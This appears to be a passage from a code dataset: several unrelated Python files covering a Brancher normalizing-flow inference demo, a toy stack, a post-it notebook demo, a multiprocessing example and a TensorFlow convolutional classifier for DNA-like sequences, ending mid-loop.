text stringlengths 38 1.54M |
|---|
import matplotlib.pyplot as plt
import numpy as np
import torch
from brancher.variables import ProbabilisticModel
from brancher.standard_variables import NormalVariable, DeterministicVariable, LogNormalVariable
import brancher.functions as BF
from brancher.visualizations import plot_density
from brancher.transformations import PlanarFlow
from brancher import inference
from brancher.visualizations import plot_posterior
# Model
# Toy hierarchical model: latent mean vector y, observed noisy data d.
M = 8
y = NormalVariable(torch.zeros((M,)), 1.*torch.ones((M,)), "y")
# NOTE(review): y[1] is the SECOND component although the variable is named
# "y0" — confirm the intended index.
y0 = DeterministicVariable(y[1], "y0")
d = NormalVariable(y, torch.ones((M,)), "d")
model = ProbabilisticModel([d, y, y0])
# get samples: observe 55 draws of d generated with y fixed at all-ones.
d.observe(d.get_sample(55, input_values={y: 1.*torch.ones((M,))}))
# Variational distribution: two stacked planar normalizing flows applied to a
# learnable diagonal-Gaussian base variable z.
u1 = DeterministicVariable(torch.normal(0., 1., (M, 1)), "u1", learnable=True)
w1 = DeterministicVariable(torch.normal(0., 1., (M, 1)), "w1", learnable=True)
b1 = DeterministicVariable(torch.normal(0., 1., (1, 1)), "b1", learnable=True)
u2 = DeterministicVariable(torch.normal(0., 1., (M, 1)), "u2", learnable=True)
w2 = DeterministicVariable(torch.normal(0., 1., (M, 1)), "w2", learnable=True)
b2 = DeterministicVariable(torch.normal(0., 1., (1, 1)), "b2", learnable=True)
z = NormalVariable(torch.zeros((M, 1)), torch.ones((M, 1)), "z", learnable=True)
Qy = PlanarFlow(w2, u2, b2)(PlanarFlow(w1, u1, b1)(z))
# Rename the flow output so it binds to the model's "y" variable.
Qy.name = "y"
Qy0 = DeterministicVariable(Qy[1], "y0")
#Qy._get_sample(4)[Qy].shape
variational_model = ProbabilisticModel([Qy, Qy0])
model.set_posterior_model(variational_model)
# Inference #
inference.perform_inference(model,
                            number_iterations=400,
                            number_samples=100,
                            optimizer="Adam",
                            lr=0.5)
loss_list1 = model.diagnostics["loss curve"]
# Plot posterior
plot_posterior(model, variables=["y0"])
plt.show()
# Variational distribution (baseline): plain mean-field Gaussian for comparison.
Qy = NormalVariable(torch.zeros((M,)), 0.5*torch.ones((M,)), "y", learnable=True)
Qy0 = DeterministicVariable(Qy[1], "y0")
variational_model = ProbabilisticModel([Qy, Qy0])
model.set_posterior_model(variational_model)
# Inference #
inference.perform_inference(model,
                            number_iterations=400,
                            number_samples=100,
                            optimizer="Adam",
                            lr=0.01)
loss_list2 = model.diagnostics["loss curve"]
# Plot posterior
plot_posterior(model, variables=["y0"])
plt.show()
# Compare the loss curves of the two variational families.
plt.plot(loss_list1)
plt.plot(loss_list2)
plt.show()
|
__author__ = '29146'
import sys
def createstack():
    """Return a new, empty stack (backed by a plain list)."""
    return []
def push(item, stack):
    """Push `item` onto `stack` in place and print the resulting stack.

    Fix: the original used a Python 2 `print` statement, which is a
    syntax error under Python 3.
    """
    stack.append(item)
    print(stack)
def pop(stack):
    """Pop and return the top item of `stack`, printing the remainder.

    Fixes: Python 2 `print` statement converted to a call; the popped
    item is now returned (previously discarded), which is backward
    compatible since the old function returned None implicitly.
    Raises IndexError on an empty stack, like list.pop().
    """
    item = stack.pop()
    print(stack)
    return item
def peek(stack):
    """Print and return the top item of `stack` without removing it.

    Fixes: Python 2 `print` statement; `stack[len(stack)-1]` replaced by
    the idiomatic `stack[-1]` (identical behavior, including IndexError
    on an empty stack). Returning the value is a backward-compatible
    addition.
    """
    top = stack[-1]
    print(top)
    return top
if __name__ == '__main__':
    # Small demo: push three values, discard the top, then show the new top.
    demo_stack = createstack()
    for value in (20, 40, 30):
        push(str(value), demo_stack)
    pop(demo_stack)
    peek(demo_stack)
import random
import time
import os
class PostIt(object):
    """A single sticky note carrying one piece of text."""

    def __init__(self, content):
        # The note's text payload.
        self.content = content
class NoteBook(object):
    """A notebook that pins text notes onto numbered pages and redraws a
    console status display after every addition."""

    def __init__(self, book_title):
        self.book_title = book_title
        # Number of add_post_it calls (kept for backward compatibility;
        # no longer used for the page count).
        self.counter = 0
        # Mapping page number -> note content.
        self.note_dict = {}

    def add_post_it(self, page, content):
        """Pin `content` onto `page` (overwriting any existing note) and
        redraw the status display."""
        self.counter += 1
        self.note_dict[page] = content
        self.show_status()

    def get_total_pages(self):
        """Return the number of distinct pages in use.

        Fix: previously returned `self.counter`, which counts calls to
        add_post_it and therefore over-counts whenever a page is
        overwritten.
        """
        return len(self.note_dict)

    def show_used_pages(self):
        """Print every used page in ascending page order."""
        keys = list(self.note_dict.keys())
        keys.sort()
        for key in keys:
            print("{:2d}. {}".format(key, self.note_dict[key]), flush=True)

    def show_status(self):
        """Clear-and-redraw style console status display."""
        print("~~~~ %s ~~~~" % self.book_title)
        print("포스트잇 갯수 = ", self.get_total_pages(), flush=True)
        print('==' * 10)
        self.show_used_pages()
        print('\n\n')
        time.sleep(0.5)
        # NOTE(review): 'cls' only clears the screen on Windows shells;
        # it is a no-op/error elsewhere.
        os.system('cls')
def add_list_to_postit(obj, titles,):
    """Pin every title onto `obj` at a distinct random page in 1..len(titles)."""
    page_count = len(titles)
    for content in titles:
        # Keep drawing until we land on a page that is still free.
        page = random.randint(1, page_count)
        while page in obj.note_dict:
            page = random.randint(1, page_count)
        obj.add_post_it(page=page, content=content)
# Demo data: placeholder song titles to scatter across the notebook.
titles = [
    'asd',
    'asd',
    'asd',
    'asd',
    'sdf',
    'asd',
    'asd',
    'asd',
    'asd',
    'sdf',
    'asd',
    'asd',
    'asd',
]
# "가사모음집" = lyrics collection.
nb = NoteBook('가사모음집')
add_list_to_postit(nb, titles)
|
# _ooOoo_
# o8888888o
# 88" . "88
# (| -_- |)
# O\ = /O
# ____/`---'\____
# . ' \\| |// `.
# / \\||| : |||// \
# / _||||| -:- |||||- \
# | | \\\ - /// | |
# | \_| ''\---/'' | |
# \ .-\__ `-` ___/-. /
# ___`. .' /--.--\ `. . __
# ."" '< `.___\_<|>_/___.' >'"".
# | | : `- \`.;`\ _ /`;.`/ - ` : | |
# \ \ `-. \_ __\ /__ _/ .-` / /
# ======`-.____`-.___\_____/___.-`____.-'======
# `=---='
#
# .............................................
# 佛祖保佑 永无BUG
# 佛曰:
# 写字楼里写字间,写字间里程序员;
# 程序人员写程序,又拿程序换酒钱。
# 酒醒只在网上坐,酒醉还来网下眠;
# 酒醉酒醒日复日,网上网下年复年。
# 但愿老死电脑间,不愿鞠躬老板前;
# 奔驰宝马贵者趣,公交自行程序员。
# 别人笑我忒疯癫,我笑自己命太贱;
# 不见满街漂亮妹,哪个归得程序员?
from multiprocessing import Process
# def func1():
# for i in range(1,10000):
# print("func1",i)
#
def func2(name):
    """Print `name` alongside each integer from 1 through 9999."""
    counter = 1
    while counter < 10000:
        print(name, counter)
        counter += 1
if __name__ == '__main__':
    # Launch two worker processes running the same counting function.
    workers = [
        Process(target=func2, args=("lisi",)),
        Process(target=func2, args=("zhangsan",)),
    ]
    for worker in workers:
        worker.start()
# class My_Process(Process):
# def __init__(self, name):
# super(My_Process,self).__init__()
# self.name = name
#
# def run(self):
# for i in range(1,10000):
# print(self.name, i)
#
# if __name__ == '__main__':
# p1 = My_Process("func1")
# p2 = My_Process("func2")
# p1.start()
# p2.start() |
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""A deep MNIST classifier using convolutional layers.
See extensive documentation at
https://www.tensorflow.org/get_started/mnist/pros
"""
# Disable linter warnings to maintain consistency with tutorial.
# pylint: disable=invalid-name
# pylint: disable=g-bad-import-order
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import sys
# from tensorflow.examples.tutorials.mnist import input_data
import gzip
import os
import tempfile
import numpy
from six.moves import urllib
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.contrib.learn.python.learn.datasets import base
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import random_seed
import tensorflow as tf
class DataSet(object):
    """In-memory dataset exposing epoch-aware mini-batch iteration.

    Holds images/labels as numpy arrays and serves them via next_batch,
    optionally flattening and rescaling images at construction time.
    """

    def __init__(self,
                 images,
                 labels,
                 fake_data=False,
                 one_hot=False,
                 dtype=dtypes.float32,
                 reshape=True,
                 seed=None):
        """Construct a DataSet.
        one_hot arg is used only if fake_data is true. `dtype` can be either
        `uint8` to leave the input as `[0, 255]`, or `float32` to rescale into
        `[0, 1]`. Seed arg provides for convenient deterministic testing.
        """
        seed1, seed2 = random_seed.get_seed(seed)
        # If op level seed is not set, use whatever graph level seed is returned
        numpy.random.seed(seed1 if seed is None else seed2)
        dtype = dtypes.as_dtype(dtype).base_dtype
        if dtype not in (dtypes.uint8, dtypes.float32):
            raise TypeError('Invalid image dtype %r, expected uint8 or float32' %
                            dtype)
        if fake_data:
            self._num_examples = 10000
            self.one_hot = one_hot
        else:
            assert images.shape[0] == labels.shape[0], (
                'images.shape: %s labels.shape: %s' % (images.shape, labels.shape))
            self._num_examples = images.shape[0]
            # Convert shape from [num examples, rows, columns, depth]
            # to [num examples, rows*columns] (assuming depth == 1)
            if reshape:
                assert images.shape[3] == 1
                images = images.reshape(images.shape[0],
                                        images.shape[1] * images.shape[2])
            if dtype == dtypes.float32:
                # Convert from [0, 255] -> [0.0, 1.0].
                images = images.astype(numpy.float32)
                images = numpy.multiply(images, 1.0 / 255.0)
        self._images = images
        self._labels = labels
        self._epochs_completed = 0
        # Cursor into the current epoch; wraps in next_batch.
        self._index_in_epoch = 0

    @property
    def images(self):
        return self._images

    @property
    def labels(self):
        return self._labels

    @property
    def num_examples(self):
        return self._num_examples

    @property
    def epochs_completed(self):
        return self._epochs_completed

    def next_batch(self, batch_size, fake_data=False, shuffle=False):
        """Return the next `batch_size` examples from this data set.

        NOTE(review): unlike the upstream TensorFlow tutorial version,
        `shuffle` defaults to False here, so batches are served in file
        order unless the caller opts in.
        """
        if fake_data:
            fake_image = [1] * 784
            if self.one_hot:
                fake_label = [1] + [0] * 9
            else:
                fake_label = 0
            return [fake_image for _ in xrange(batch_size)], [
                fake_label for _ in xrange(batch_size)
            ]
        start = self._index_in_epoch
        # Shuffle for the first epoch
        if self._epochs_completed == 0 and start == 0 and shuffle:
            perm0 = numpy.arange(self._num_examples)
            numpy.random.shuffle(perm0)
            self._images = self.images[perm0]
            self._labels = self.labels[perm0]
        # Go to the next epoch
        if start + batch_size > self._num_examples:
            # Finished epoch
            self._epochs_completed += 1
            # Get the rest examples in this epoch
            rest_num_examples = self._num_examples - start
            images_rest_part = self._images[start:self._num_examples]
            labels_rest_part = self._labels[start:self._num_examples]
            # Shuffle the data
            if shuffle:
                perm = numpy.arange(self._num_examples)
                numpy.random.shuffle(perm)
                self._images = self.images[perm]
                self._labels = self.labels[perm]
            # Start next epoch: take the remainder from the freshly (re)ordered data.
            start = 0
            self._index_in_epoch = batch_size - rest_num_examples
            end = self._index_in_epoch
            images_new_part = self._images[start:end]
            labels_new_part = self._labels[start:end]
            return numpy.concatenate((images_rest_part, images_new_part), axis=0), numpy.concatenate(
                (labels_rest_part, labels_new_part), axis=0)
        else:
            self._index_in_epoch += batch_size
            end = self._index_in_epoch
            return self._images[start:end], self._labels[start:end]
def _read32(bytestream):
dt = numpy.dtype(numpy.uint32).newbyteorder('>')
return numpy.frombuffer(bytestream.read(4), dtype=dt)[0]
def extract_images(f):
    """Extract images into a 4D numpy array [index, y, x, depth].

    Args:
      f: An open binary file object positioned at an MNIST-style header
        (must expose a `.name` attribute for logging).
    Returns:
      data: A 4D array [index, y, x, depth]. The raw uint8 values are
        multiplied by 255.0, so the result is floating point.
    Raises:
      ValueError: If the stream does not start with magic number 2051.
    """
    print('Extracting', f.name)
    stream = f
    magic = _read32(stream)
    print('Extracted %d' % magic)
    if magic != 2051:
        raise ValueError('Invalid magic number %d in MNIST image file: %s' %
                         (magic, f.name))
    num_images = _read32(stream)
    rows = _read32(stream)
    cols = _read32(stream)
    print(num_images, rows, cols)
    raw = numpy.frombuffer(stream.read(rows * cols * num_images),
                           dtype=numpy.uint8)
    print(num_images, rows, cols)
    return raw.reshape(num_images, rows, cols, 1) * 255.0
def dense_to_one_hot(labels_dense, num_classes):
    """Convert integer class labels to a [num_labels, num_classes] one-hot array."""
    num_labels = labels_dense.shape[0]
    one_hot = numpy.zeros((num_labels, num_classes))
    # Flat index of each sample's hot column: row_offset + class_index.
    row_offsets = numpy.arange(num_labels) * num_classes
    one_hot.flat[row_offsets + labels_dense.ravel()] = 1
    return one_hot
def extract_labels(f, one_hot=False, num_classes=2):
    """Extract the labels into a numpy array.

    The binary-classification labels stored as {0, 1} bytes are remapped to
    {-1.0, +1.0} floats for the sign-based classifier used downstream.

    Args:
      f: A file object positioned at an MNIST-style label header.
      one_hot: Does one hot encoding for the result.
      num_classes: Number of classes for the one hot encoding.
    Returns:
      labels: a [num_items, 1] float array of -1/+1 values, or a
        [num_items, num_classes] one-hot array when `one_hot` is True.
    Raises:
      ValueError: If the bytestream doesn't start with 2049.
    """
    print('Extracting', f.name)
    bytestream = f
    magic = _read32(bytestream)
    print('Extracted %d' % magic)
    if magic != 2049:
        raise ValueError('Invalid magic number %d in MNIST label file: %s' %
                         (magic, f.name))
    num_items = _read32(bytestream)
    buf = bytestream.read(num_items)
    raw = numpy.frombuffer(buf, dtype=numpy.uint8)
    if one_hot:
        # BUG FIX: one-hot encode the raw {0, 1} byte labels. The original
        # code remapped to -1.0/+1.0 first, making dense_to_one_hot index
        # with negative floats and crash.
        return dense_to_one_hot(raw, num_classes)
    labels = raw * 2.0 - 1.0
    return labels.reshape(num_items, 1)
def read_data_sets(train_dir,
                   fake_data=False,
                   one_hot=False,
                   dtype=dtypes.float32,
                   reshape=True,
                   validation_size=5000,
                   seed=None):
    """Load the custom "same" 500K train/test binary files as Datasets.

    NOTE(review): `train_dir` is unused — files are read from the current
    working directory using the hard-coded names below.
    """
    if fake_data:
        def fake():
            return DataSet(
                [], [], fake_data=True, one_hot=one_hot, dtype=dtype, seed=seed)
        train = fake()
        validation = fake()
        test = fake()
        return base.Datasets(train=train, validation=validation, test=test)
    # TRAIN_IMAGES = 'train.set.no.init.shift.data.ubyte1'
    # TRAIN_LABELS = 'train.set.no.init.shift.label.ubyte'
    # TEST_IMAGES = 'test.set.no.init.shift.data.ubyte1'
    # TEST_LABELS = 'test.set.no.init.shift.label.ubyte'
    # TRAIN_IMAGES = 'train.set.200K.data.ubyte1'
    # TRAIN_LABELS = 'train.set.200K.label.ubyte'
    TRAIN_IMAGES = 'train.set.same.500K.data.ubyte'
    TRAIN_LABELS = 'train.set.same.500K.label.ubyte'
    # TRAIN_IMAGES = 'train.set.data.ubyte1'
    # TRAIN_LABELS = 'train.set.label.ubyte'
    TEST_IMAGES = 'test.set.same.data.ubyte'
    TEST_LABELS = 'test.set.same.label.ubyte'
    local_file = TRAIN_IMAGES
    with open(local_file, 'rb') as f:
        train_images = extract_images(f)
    local_file = TRAIN_LABELS
    with open(local_file, 'rb') as f:
        train_labels = extract_labels(f, one_hot=one_hot)
    local_file = TEST_IMAGES
    with open(local_file, 'rb') as f:
        test_images = extract_images(f)
    local_file = TEST_LABELS
    with open(local_file, 'rb') as f:
        test_labels = extract_labels(f, one_hot=one_hot)
    if not 0 <= validation_size <= len(train_images):
        raise ValueError(
            'Validation size should be between 0 and {}. Received: {}.'
            .format(len(train_images), validation_size))
    # Carve the validation split off the front of the training data.
    validation_images = train_images[:validation_size]
    validation_labels = train_labels[:validation_size]
    train_images = train_images[validation_size:]
    train_labels = train_labels[validation_size:]
    options = dict(dtype=dtype, reshape=reshape, seed=seed)
    train = DataSet(train_images, train_labels, **options)
    validation = DataSet(validation_images, validation_labels, **options)
    test = DataSet(test_images, test_labels, **options)
    return base.Datasets(train=train, validation=validation, test=test)
def read_data_sets2(train_dir,
                    fake_data=False,
                    one_hot=False,
                    dtype=dtypes.float32,
                    reshape=True,
                    validation_size=5000,
                    seed=None):
    """Load the second ("ubyte2") 500K train/test binary files as Datasets.

    NOTE(review): copy-paste duplicate of read_data_sets differing only in
    the hard-coded file names; `train_dir` is likewise unused.
    """
    if fake_data:
        def fake():
            return DataSet(
                [], [], fake_data=True, one_hot=one_hot, dtype=dtype, seed=seed)
        train = fake()
        validation = fake()
        test = fake()
        return base.Datasets(train=train, validation=validation, test=test)
    # TRAIN_IMAGES = 'train.set.no.init.shift.data.ubyte2'
    # TRAIN_LABELS = 'train.set.no.init.shift.label.ubyte'
    # TEST_IMAGES = 'test.set.no.init.shift.data.ubyte2'
    # TEST_LABELS = 'test.set.no.init.shift.label.ubyte'
    # TRAIN_IMAGES = 'train.set.200K.data.ubyte2'
    # TRAIN_LABELS = 'train.set.200K.label.ubyte'
    TRAIN_IMAGES = 'train.set.500K.data.ubyte2'
    TRAIN_LABELS = 'train.set.500K.label.ubyte'
    # TRAIN_IMAGES = 'train.set.data.ubyte2'
    # TRAIN_LABELS = 'train.set.label.ubyte'
    TEST_IMAGES = 'test.set.data.ubyte2'
    TEST_LABELS = 'test.set.label.ubyte'
    local_file = TRAIN_IMAGES
    with open(local_file, 'rb') as f:
        train_images = extract_images(f)
    local_file = TRAIN_LABELS
    with open(local_file, 'rb') as f:
        train_labels = extract_labels(f, one_hot=one_hot)
    local_file = TEST_IMAGES
    with open(local_file, 'rb') as f:
        test_images = extract_images(f)
    local_file = TEST_LABELS
    with open(local_file, 'rb') as f:
        test_labels = extract_labels(f, one_hot=one_hot)
    if not 0 <= validation_size <= len(train_images):
        raise ValueError(
            'Validation size should be between 0 and {}. Received: {}.'
            .format(len(train_images), validation_size))
    # Carve the validation split off the front of the training data.
    validation_images = train_images[:validation_size]
    validation_labels = train_labels[:validation_size]
    train_images = train_images[validation_size:]
    train_labels = train_labels[validation_size:]
    options = dict(dtype=dtype, reshape=reshape, seed=seed)
    train = DataSet(train_images, train_labels, **options)
    validation = DataSet(validation_images, validation_labels, **options)
    test = DataSet(test_images, test_labels, **options)
    return base.Datasets(train=train, validation=validation, test=test)
# Populated from the command line in the __main__ block at the bottom.
FLAGS = None
def deepnn(x1):
    """deepnn builds the graph for a deep net classifying 100x8 inputs.

    Args:
      x1: an input tensor with the dimensions (N_examples, 800); each row is
        reshaped to a 100x8 single-channel "image" (100 positions, 8-wide
        encoding — presumably a pair of one-hot DNA bases per position; TODO
        confirm against the data pipeline).
    Returns:
      A tuple (inner_product, W_conv1, W_conv2, W_fc1, h1_conv1):
      `inner_product` is a (N_examples, 1) tensor of raw scores whose sign is
      the binary class prediction; the remaining entries expose intermediate
      weights/activations for the dump code in main().
      (NOTE(review): the original docstring described a stale (y, keep_prob)
      interface that this function no longer has.)
    """
    # Reshape to use within a convolutional neural net.
    # Last dimension is for "features" - there is only one here, since images are
    # grayscale -- it would be 3 for an RGB image, 4 for RGBA, etc.
    x1_image = tf.reshape(x1, [-1, 100, 8, 1])
    tanh_const = tf.constant(1.0)
    # First convolutional layer - maps one grayscale image to 32 feature maps.
    # W_conv1 = weight_variable([3, 4, 1, 64])
    # W_conv1 = tf.reshape(W1_det, [3, 8, 1, 64])
    W_conv1 = weight_variable([3, 8, 1, 64])
    h1_conv1 = tf.nn.relu(conv2d_1(x1_image, W_conv1))
    # h1_conv1 = tf.nn.relu(conv2d_1(x1_image, W_conv1) - 2)
    # Pooling layer - downsamples by 5X along the position axis.
    h1_pool1 = max_pool_5x1(h1_conv1)
    # Second convolutional layer -- maps 64 feature maps to 64.
    W_conv2 = weight_variable([5, 1, 64, 64])
    h1_conv2 = tf.nn.relu(tf.nn.tanh(tf.multiply(tanh_const, conv2d(h1_pool1, W_conv2))))
    # h1_conv2 = tf.nn.relu(tf.nn.tanh(tf.multiply(tanh_const,conv2d(h1_pool1, W_conv2) + b_conv2)))
    # Second pooling layer.
    h1_pool2 = max_pool_2x1(h1_conv2)
    # h1_pool2 = (h1_conv2)
    # Third convolutional layer -- maps 64 feature maps to 40.
    W_conv3 = weight_variable([4, 1, 64, 40])
    # h1_conv3 = tf.nn.relu(tf.nn.tanh(tf.multiply(tanh_const,conv2d(h1_pool2, W_conv3) + b_conv3)))
    h1_conv3 = tf.nn.relu(tf.nn.tanh(tf.multiply(tanh_const, conv2d(h1_pool2, W_conv3))))
    # Third pooling layer.
    # h1_pool3 = max_pool_2x1(h1_conv3)
    # h1_pool3 = h1_conv3
    h1_pool3 = max_pool_2x1(h1_conv3)
    # Fully connected layer 1 -- after the downsampling the feature maps are
    # flattened to 200 values per example and mapped to 50 features.
    W_fc1 = weight_variable([200, 50])
    h1_pool2_flat = tf.reshape(h1_pool3, [-1, 200])
    tanh_beta = tf.constant(1.0)
    tanh_beta2 = tf.constant(1.0)
    h1_fc1 = tf.nn.tanh(tf.multiply(tanh_const, tf.matmul(h1_pool2_flat, W_fc1)))
    # h1_fc1 = tf.nn.tanh(tf.multiply(tanh_const,tf.matmul(h1_pool2_flat, W_fc1)) + b2_fc1)
    # h2_fc1 = tf.nn.tanh(tf.multiply(tanh_const,tf.matmul(h2_pool2_flat, W_fc1)) + b2_fc1)
    # Final linear readout to a single score.
    W_final = weight_variable([50, 1])
    b_final = bias_variable([1])
    inner_product = tf.matmul(h1_fc1, W_final) + b_final
    return inner_product, W_conv1, W_conv2, W_fc1, h1_conv1
    # return inner_product
def conv2d(x, W):
    """conv2d returns a 2d convolution layer with full stride (stride 1)."""
    return tf.nn.conv2d(x, W, strides=[1, 1, 1, 1], padding='SAME')
def conv2d_1(x, W):
    """2d convolution with stride 8 along the width axis.

    Used on the 100x8 input so each filter application consumes one full
    8-wide encoded column. (The original docstring was a copy-paste of
    conv2d's "full stride" text and was inaccurate.)
    """
    return tf.nn.conv2d(x, W, strides=[1, 1, 8, 1], padding='SAME')
def max_pool_2x1(x):
    """Downsample a feature map by 2X along the height axis."""
    return tf.nn.max_pool(x, ksize=[1, 2, 1, 1],
                          strides=[1, 2, 1, 1], padding='SAME')
def max_pool_4x1(x):
    """Downsample a feature map by 4X along the height axis.

    (Original docstring was a stale copy of max_pool_2x1's.)
    """
    return tf.nn.max_pool(x, ksize=[1, 4, 1, 1],
                          strides=[1, 4, 1, 1], padding='SAME')
def max_pool_5x1(x):
    """Downsample a feature map by 5X along the height axis.

    (Original docstring was a stale copy of max_pool_2x1's.)
    """
    return tf.nn.max_pool(x, ksize=[1, 5, 1, 1],
                          strides=[1, 5, 1, 1], padding='SAME')
def max_pool_10x1(x):
    """Downsample a feature map by 10X along the height axis.

    (Original docstring was a stale copy of max_pool_2x1's.)
    """
    return tf.nn.max_pool(x, ksize=[1, 10, 1, 1],
                          strides=[1, 10, 1, 1], padding='SAME')
def max_pool_2x2(x):
    """max_pool_2x2 downsamples a feature map by 2X in both spatial axes."""
    return tf.nn.max_pool(x, ksize=[1, 2, 2, 1],
                          strides=[1, 2, 2, 1], padding='SAME')
def weight_variable(shape):
    """weight_variable generates a weight variable of a given shape,
    initialized from a truncated normal with stddev 0.1."""
    initial = tf.truncated_normal(shape, stddev=0.1)
    return tf.Variable(initial)
def bias_variable(shape):
    """bias_variable generates a bias variable of a given shape,
    initialized to the constant 0.1."""
    initial = tf.constant(0.1, shape=shape)
    return tf.Variable(initial)
def main(_):
    """Build the graph, train for 20000 steps, dump weights/activations to
    text files, then report test accuracy and FP/FN counts."""
    # Import data
    mnist1 = read_data_sets(FLAGS.data_dir, one_hot=False)
    # Create the model
    x1 = tf.placeholder(tf.float32, [None, 800])
    # Create deterministic weights of first layer.
    # NOTE(review): W1_vals/W1s are fed below but nothing in deepnn()
    # consumes them — apparently leftovers from a deterministic-first-layer
    # experiment (see the commented W1_det line inside deepnn).
    W1_vals = tf.placeholder(tf.float32, [768])
    W1s = []
    # Build a fixed 3*4*4*4*4 = 768-entry 0/1 indicator table.
    for m in range(3):
        for n in range(4):
            for k in range(4):
                for i in range(4):
                    for j in range(4):
                        if m == 0:
                            if n == i:
                                W1s.append(1.0)
                            else:
                                W1s.append(.0)
                        elif m == 1:
                            if n == j:
                                W1s.append(1.0)
                            else:
                                W1s.append(.0)
                        else:
                            if n == k:
                                W1s.append(1.0)
                            else:
                                W1s.append(.0)
    # Define loss and optimizer
    y_ = tf.placeholder(tf.float32, [None, 1])
    # binary training step size (unused below)
    train_ss = tf.placeholder(tf.float32)
    tri_level = tf.placeholder(tf.float32)
    # Build the graph for the deep net
    y_conv, W1_temp, W2_temp, W3_temp, h1_temp = deepnn(x1)
    # training: squared error on the -1/+1 targets (name kept for history;
    # this is not a cross-entropy). keep_dims is the pre-TF-1.5 spelling.
    cross_entropy = tf.reduce_mean(tf.square(y_ - y_conv), keep_dims=True)
    train_step = tf.train.AdamOptimizer(1e-4).minimize(cross_entropy)
    # test: prediction is the sign of the raw score.
    final_pred = tf.cast(tf.sign(y_conv), tf.float32)
    correct_prediction = tf.equal(final_pred, y_)
    accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
    # output monitor FP + FN: pred - label is +2 for a false positive and
    # -2 for a false negative on -1/+1 labels.
    out_diff = final_pred - y_
    false_pos_sum = tf.reduce_sum(tf.cast(tf.equal(out_diff, 2), tf.float32))
    false_neg_sum = tf.reduce_sum(tf.cast(tf.equal(out_diff, -2), tf.float32))
    false_pos = tf.equal(out_diff, 2)
    false_neg = tf.equal(out_diff, -2)
    # saver for the variables
    saver = tf.train.Saver()
    with tf.Session() as sess:
        sess.run(tf.global_variables_initializer())
        # loading the variables
        # saver.restore(sess, "./vars/all_weights")
        # print("Model restored.")
        # training
        num_iter = 20000
        for i in range(num_iter):
            batch1 = mnist1.train.next_batch(50)
            if i % 100 == 0:
                train_accuracy = accuracy.eval(feed_dict={x1: batch1[0], y_: batch1[1]})
                print('step %d, training accuracy %g' % (i, train_accuracy))
            train_step.run(feed_dict={x1: batch1[0], y_: batch1[1]})
        # saving the variables
        # save_path = saver.save(sess, "./vars/all_weights")
        # print("Model saved in file: %s" % save_path)
        # Dump first-layer activations for a single training sample.
        batch_temp = mnist1.train.next_batch(1)
        f = open("h_conv1", "w")
        print("H_CONV1")
        Wtemp = sess.run(h1_temp, feed_dict={W1_vals: W1s, x1: batch_temp[0]})
        for k in range(64):
            for i in range(1):
                for j in range(100):
                    f.write(str(Wtemp[i][j][0][k]))
                    f.write('\n')
        f.close()
        # print Conv1 Weights
        f = open("w_conv1", "w")
        print("W_CONV1")
        Wtemp = sess.run(W1_temp, feed_dict={W1_vals: W1s})
        for k in range(64):
            for i in range(3):
                for j in range(4):
                    f.write(str(Wtemp[i][j][0][k]))
                    f.write('\n')
        f.close()
        # print Conv1 binary Weights
        # f = open("w_conv1_bin", "w")
        # print("W_CONV1_bin")
        # Wtemp = sess.run(W1_bin, feed_dict={W1_vals:W1s})
        # for i in range(3):
        #     for j in range(4):
        #         for k in range(64):
        #             f.write ( str(Wtemp[i][j][0][k]) )
        #             f.write ( '\n' )
        # f.close()
        # print Conv2 Weights
        # NOTE(review): only the first 20 of the 64 output channels are
        # dumped here — confirm whether that truncation is intentional.
        f = open("w_conv2", "w")
        print("W_CONV2")
        Wtemp = sess.run(W2_temp)
        for i in range(5):
            for j in range(64):
                for k in range(20):
                    f.write(str(Wtemp[i][0][j][k]))
                    f.write('\n')
        f.close()
        # print Conv2 triary Weights
        # f = open("w_conv2_tri", "w")
        # print("W_CONV2_tri")
        # Wtemp = sess.run(W2_tri, feed_dict={tri_level: tri_train_level})
        # for i in range(5):
        #     for j in range(64):
        #         for k in range(20):
        #             f.write ( str(Wtemp[i][0][j][k]) )
        #             f.write ( '\n' )
        # f.close()
        # print Fully-Connected Weights
        # NOTE(review): W_fc1 is [200, 50] but only [100, 30] is dumped.
        f = open("w_fc", "w")
        print("W_FC")
        Wtemp = sess.run(W3_temp)
        for i in range(100):
            for j in range(30):
                f.write(str(Wtemp[i][j]))
                f.write('\n')
        f.close()
        # print Fully-Connected triary Weights
        # f = open("w_fc_tri", "w")
        # print("W_FC_tri")
        # Wtemp = sess.run(W3_tri, feed_dict={tri_level: tri_train_level})
        # for i in range(500):
        #     for j in range(30):
        #         f.write ( str(Wtemp[i][j]) )
        #         f.write ( '\n' )
        # f.close()
        # test
        batch_size = 50
        batch_num = int(mnist1.test.num_examples / batch_size)
        test_accuracy = 0
        total_FP = 0
        total_FN = 0
        for i in range(batch_num):
            batch1 = mnist1.test.next_batch(batch_size)
            test_accuracy += accuracy.eval(feed_dict={x1: batch1[0], y_: batch1[1]})
            total_FP += false_pos_sum.eval(feed_dict={x1: batch1[0], y_: batch1[1]})
            total_FN += false_neg_sum.eval(feed_dict={x1: batch1[0], y_: batch1[1]})
            FPs = false_pos.eval(feed_dict={x1: batch1[0], y_: batch1[1]})
            FNs = false_neg.eval(feed_dict={x1: batch1[0], y_: batch1[1]})
            # X1s = batch1[0]
            # X2s = batch2[0]
            # Dead debug branches below ("if False"): they reference X1s/X2s,
            # which are commented out above and UNDEFINED — re-enabling the
            # original FPs[j]/FNs[j] conditions would raise NameError.
            for j in range(batch_size):
                # if FPs[j] == True:
                if False:
                    fp_ind = i * batch_size + j
                    print("FP 0 @ %d" % fp_ind)
                    X1_tmp = X1s[j]
                    for k in range(100):
                        if X1_tmp[k * 4] == 1:
                            print('A', end='')
                        elif X1_tmp[k * 4 + 1] == 1:
                            print('C', end='')
                        elif X1_tmp[k * 4 + 2] == 1:
                            print('G', end='')
                        else:
                            print('T', end='')
                    print(' ', end='\n')
                    X2_tmp = X2s[j]
                    for k in range(100):
